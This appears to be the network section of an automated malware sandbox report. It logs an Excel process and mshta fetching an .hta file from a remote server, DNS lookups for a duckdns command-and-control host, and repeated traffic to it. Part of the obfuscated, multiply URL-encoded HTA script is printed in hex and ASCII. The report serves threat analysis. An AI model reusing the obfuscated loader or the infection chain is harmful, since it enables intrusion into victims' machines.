                                              Sep 9, 2024 17:49:17.359255075 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.359261990 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.359266043 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.359285116 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.359930038 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.359941959 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.359951019 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.359961987 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.359972000 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.359977961 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.359983921 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.359991074 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.359996080 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.360008001 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.360013008 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.360019922 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.360032082 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.360037088 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.360043049 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.360054970 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.360059977 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.360084057 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.360198975 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.360210896 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.360220909 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.360232115 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.360233068 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.360243082 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.360263109 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.407618046 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.407654047 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.407665014 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.407706022 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.407737970 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.407737970 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.407771111 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.407803059 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.407804966 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.407835960 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.407869101 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.407870054 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.441982031 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.441998959 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442009926 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442035913 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.442068100 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.442111969 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442123890 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442157984 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.442292929 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442305088 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442317009 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442337036 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.442450047 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442460060 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442471027 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442481995 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442483902 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.442500114 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.442516088 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442534924 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442544937 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442548037 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.442555904 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442579985 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.442697048 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442708969 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442720890 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442739964 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.442903042 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442913055 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442923069 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.442933083 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443031073 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443068027 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443078995 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443089008 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443099022 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443106890 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443110943 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443121910 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443294048 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443305016 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443315983 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443322897 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443327904 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443341970 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443348885 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443351984 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443382025 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443440914 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443453074 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443485022 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443653107 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443664074 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443691969 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443809032 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443820000 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443830013 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443840981 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443850040 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443854094 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443864107 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443876028 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443881989 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443887949 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443898916 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443908930 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443912983 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443919897 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443931103 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443936110 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443943024 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443958044 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443962097 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443969011 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443980932 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.443984985 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.443990946 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.444008112 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.664582014 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.664952993 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.822551966 CEST8049172178.237.33.50192.168.2.22
                                              Sep 9, 2024 17:49:17.823874950 CEST4917280192.168.2.22178.237.33.50
                                              Sep 9, 2024 17:49:22.967453957 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:22.972520113 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.972557068 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.972585917 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:22.972620964 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:22.977438927 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.977504015 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:22.977514029 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.977544069 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.977560997 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:22.977587938 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:22.977623940 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.977677107 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:22.982386112 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.982443094 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:22.982486010 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.982513905 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.982566118 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.982593060 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.982774019 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.982824087 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.982889891 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.983077049 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:22.987524986 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.987554073 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.987581968 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.988259077 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:22.988308907 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:36.951539040 CEST1464549170192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:36.968108892 CEST4917014645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:36.973042011 CEST1464549170192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:50:06.981837034 CEST1464549170192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:50:06.983870029 CEST4917014645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:50:06.989509106 CEST1464549170192.3.101.29192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 9, 2024 17:48:55.133359909 CEST5456253192.168.2.228.8.8.8
                                              Sep 9, 2024 17:48:55.140508890 CEST53545628.8.8.8192.168.2.22
                                              Sep 9, 2024 17:48:57.605755091 CEST5291753192.168.2.228.8.8.8
                                              Sep 9, 2024 17:48:57.612968922 CEST53529178.8.8.8192.168.2.22
                                              Sep 9, 2024 17:49:09.531524897 CEST6275153192.168.2.228.8.8.8
                                              Sep 9, 2024 17:49:09.538324118 CEST53627518.8.8.8192.168.2.22
                                              Sep 9, 2024 17:49:14.453046083 CEST5789353192.168.2.228.8.8.8
                                              Sep 9, 2024 17:49:14.549190998 CEST53578938.8.8.8192.168.2.22
                                              Sep 9, 2024 17:49:16.159074068 CEST5482153192.168.2.228.8.8.8
                                              Sep 9, 2024 17:49:16.167825937 CEST53548218.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 9, 2024 17:48:55.133359909 CEST192.168.2.228.8.8.80x7850Standard query (0)zeep.lyA (IP address)IN (0x0001)false
                                              Sep 9, 2024 17:48:57.605755091 CEST192.168.2.228.8.8.80xb93Standard query (0)zeep.lyA (IP address)IN (0x0001)false
                                              Sep 9, 2024 17:49:09.531524897 CEST192.168.2.228.8.8.80x5ad9Standard query (0)ia601706.us.archive.orgA (IP address)IN (0x0001)false
                                              Sep 9, 2024 17:49:14.453046083 CEST192.168.2.228.8.8.80x3cadStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                              Sep 9, 2024 17:49:16.159074068 CEST192.168.2.228.8.8.80x8655Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 9, 2024 17:48:55.140508890 CEST8.8.8.8192.168.2.220x7850No error (0)zeep.ly95.217.202.210A (IP address)IN (0x0001)false
                                              Sep 9, 2024 17:48:57.612968922 CEST8.8.8.8192.168.2.220xb93No error (0)zeep.ly95.217.202.210A (IP address)IN (0x0001)false
                                              Sep 9, 2024 17:49:09.538324118 CEST8.8.8.8192.168.2.220x5ad9No error (0)ia601706.us.archive.org207.241.227.96A (IP address)IN (0x0001)false
                                              Sep 9, 2024 17:49:14.549190998 CEST8.8.8.8192.168.2.220x3cadNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                              Sep 9, 2024 17:49:16.167825937 CEST8.8.8.8192.168.2.220x8655No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • zeep.ly
                                              • ia601706.us.archive.org
                                              • 185.235.137.223
                                              • geoplugin.net

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.2249164185.235.137.223803236C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              TimestampBytes transferredDirectionData
                                              Sep 9, 2024 17:48:56.275407076 CEST360OUTGET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 185.235.137.223
                                              Connection: Keep-Alive
                                              Sep 9, 2024 17:48:56.908236980 CEST1236INHTTP/1.1 200 OK
                                              Date: Mon, 09 Sep 2024 15:48:56 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                              Last-Modified: Mon, 09 Sep 2024 07:16:01 GMT
                                              ETag: "24cb3-621aa877cb395"
                                              Accept-Ranges: bytes
                                              Content-Length: 150707
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/hta
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 32 25 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 32 35 33 45 6d 25 32 35 32 35 33 44 25 32 35 32 35 32 37 25 32 35 32 35 32 35 33 43 25 32 35 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 32 35 33 45 25 32 35 32 35 32 35 30 41 25 32 35 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 32 35 33 44 25 [TRUNCATED]
                                              Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CScript%25252520laNgUAGE%2525253D%25252522vbScRiPt%25252522%2525253E%2525250ADiM%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
                                              Sep 9, 2024 17:48:56.908268929 CEST1236INData Raw: 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30
                                              Data Ascii: 0%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
                                              Sep 9, 2024 17:48:56.908297062 CEST1236INData Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35
                                              Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                              Sep 9, 2024 17:48:56.908314943 CEST1236INData Raw: 43 6b 6e 6d 6c 6d 71 50 4a 4d 72 41 79 4e 74 6e 54 56 59 43 65 70 69 6e 72 48 5a 73 43 54 65 61 59 4a 45 57 70 48 6b 58 54 6c 4b 51 6d 76 43 72 54 71 4b 45 6c 68 52 48 59 75 4b 6f 44 75 50 67 56 52 6a 59 41 55 4d 72 46 73 78 70 4e 62 65 43 49 44
                                              Data Ascii: CknmlmqPJMrAyNtnTVYCepinrHZsCTeaYJEWpHkXTlKQmvCrTqKElhRHYuKoDuPgVRjYAUMrFsxpNbeCIDgQapQrWzIKsQZZWcTdTVmguArDeAoeOdaVyIvzKqInY%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%
                                              Sep 9, 2024 17:48:56.908350945 CEST896INData Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35
                                              Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                              Sep 9, 2024 17:48:56.908366919 CEST1236INData Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25
                                              Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520
                                              Sep 9, 2024 17:48:56.908406019 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                              Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25
                                              Sep 9, 2024 17:48:56.908488989 CEST448INData Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                              Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252
                                              Sep 9, 2024 17:48:56.908513069 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35
                                              Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                              Sep 9, 2024 17:48:56.908535004 CEST224INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                              Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                              Sep 9, 2024 17:48:56.913536072 CEST1236INData Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35
                                              Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.2249166185.235.137.223803504C:\Windows\System32\mshta.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 9, 2024 17:48:58.933820009 CEST437OUTGET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1
                                              Accept: */*
                                              Accept-Language: en-US
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 185.235.137.223
                                              Connection: Keep-Alive
                                              Range: bytes=8896-
                                              If-Range: "24cb3-621aa877cb395"
                                              Sep 9, 2024 17:48:59.517690897 CEST1236INHTTP/1.1 206 Partial Content
                                              Date: Mon, 09 Sep 2024 15:48:59 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                              Last-Modified: Mon, 09 Sep 2024 07:16:01 GMT
                                              ETag: "24cb3-621aa877cb395"
                                              Accept-Ranges: bytes
                                              Content-Length: 141811
                                              Content-Range: bytes 8896-150706/150707
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/hta
